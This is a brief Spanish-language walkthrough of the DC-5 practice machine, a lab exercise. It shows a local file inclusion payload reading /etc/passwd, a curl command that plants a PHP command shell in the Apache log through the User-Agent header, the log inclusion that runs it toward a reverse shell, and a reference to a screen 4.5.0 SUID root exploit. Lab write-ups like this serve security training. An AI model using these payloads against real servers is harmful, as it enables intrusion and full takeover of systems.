DC-5 es excelente para entrenar el ojo: la vulnerabilidad no está en un parámetro obvio sino en un comportamiento dinámico de la página.
Servicios: 80 HTTP · 111 rpcbind · 47648
1. Detección del LFI
El año del footer cambia al refrescar la página. Eso revela que thankyou.php incluye dinámicamente footer.php, y que el parámetro file es un Local File Inclusion:
http://target/thankyou.php?file=/etc/passwd
2. Log poisoning → RCE
Inyectamos código PHP en el access log de Apache a través de la cabecera User-Agent, y luego incluimos el log vía el LFI para ejecutarlo:
curl -A '<?php system($_GET["c"]); ?>' http://target/
# luego: thankyou.php?file=/var/log/apache2/access.log&c=<reverse shell>
3. Escalada — screen 4.5.0
El sistema tiene screen 4.5.0 con SUID, vulnerable a una LPE pública:
# exploit screen-v4.5.0-priv-escalate → root
Conceptos aplicados
- LFI identificado por comportamiento dinámico (no por un parámetro evidente).
- Log poisoning para convertir LFI en RCE.
- screen 4.5.0 SUID LPE.